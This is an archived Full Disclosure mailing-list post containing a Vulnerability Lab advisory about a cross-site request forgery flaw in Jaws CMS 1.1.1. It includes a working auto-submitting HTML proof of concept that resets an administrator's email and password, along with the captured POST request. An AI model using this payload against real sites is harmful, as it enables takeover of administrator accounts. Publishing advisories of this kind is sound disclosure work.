[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Jaws CMS v1.1.1 - Privilege Escalate CSRF Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-08-22 13:01:54
Message-ID: 75c8d830-d5d3-6406-87da-d32e9bc97d91 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Jaws CMS v1.1.1 - Privilege Escalate CSRF Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1923
Release Date:
=============
2016-08-22
Vulnerability Laboratory ID (VL-ID):
====================================
1923
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Jaws is a Framework and Content Management System for building dynamic web sites. It aims to be \
User Friendly giving ease of use and lots of ways to customize web sites, but at the same time \
is Developer Friendly, it offers a simple and powerful framework to hack your own modules.
(Copy of the Vendor Homepage: http://jaws-project.com )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site request \
forgery vulnerability in the Jaws v1.1.1 content management system.
Vulnerability Disclosure Timeline:
==================================
2016-08-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Jaws Project
Product: Jaws - Content Management System 1.1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the content management system \
Jaws official v1.1.1. The vulnerability allows to perform malicious client-side web-application \
request to execute non-protected functions with own web context.
In the absence of security token, an attacker could execute arbitrary code in the \
administrator's browser to gain unauthorized access to the administrator privileges. The \
vulnerability is located in the edituser.php file of the
./user/account.html module. The request method to execute is POST and the attack vector is \
client-side performed by the remote attacker.
Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application \
without privileged user account and without user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
PoC: CSRF Exploitation
<html>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<form name="profilebox" action="http://localhost.jaws-project.com/index.php" method="post">
<input type="hidden" name="gadget" value="Users" />
<input type="hidden" name="action" value="UpdateAccount" />
<div class="content">
<input type="hidden" name="email" id="profile_email" value="admin@example.org" />
<input type="hidden" name="nickname" id="profile_nickname" value="VulnLabsAdministrator" />
<input type="hidden" name="password" id="profile_password" type="password" value="1234" />
<input type="hidden" name="password_check" id="profile_chkpasswd" type="password" value="1234" \
/> </div>
<div class="actions"><button type="submit" value="Update Account">Update Account</button></div>
<script>document.forms[0].submit()</script>
</form>
</div>
</html>
--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: jaws.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://jaws.localhost:8080/user/account.html
Cookie: JAWSSESSID=2-88361181057b9d4d878d1c6.98434178; VisitCounter=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
-
POST Method: gadget=Users&action=UpdateAccount&email=admin%40evilsource.com&nickname=VulnLabsAdministrator&password=1337&password_check=1337
Reference(s):
http://jaws.localhost:8080/
http://jaws.localhost:8080/user/
http://jaws.localhost:8080/user/account.html
Security Risk:
==============
The security risk of the client-side cross site request forgery issue in the web-application is \
estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
ZwX - ( http://zwx.fr ) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic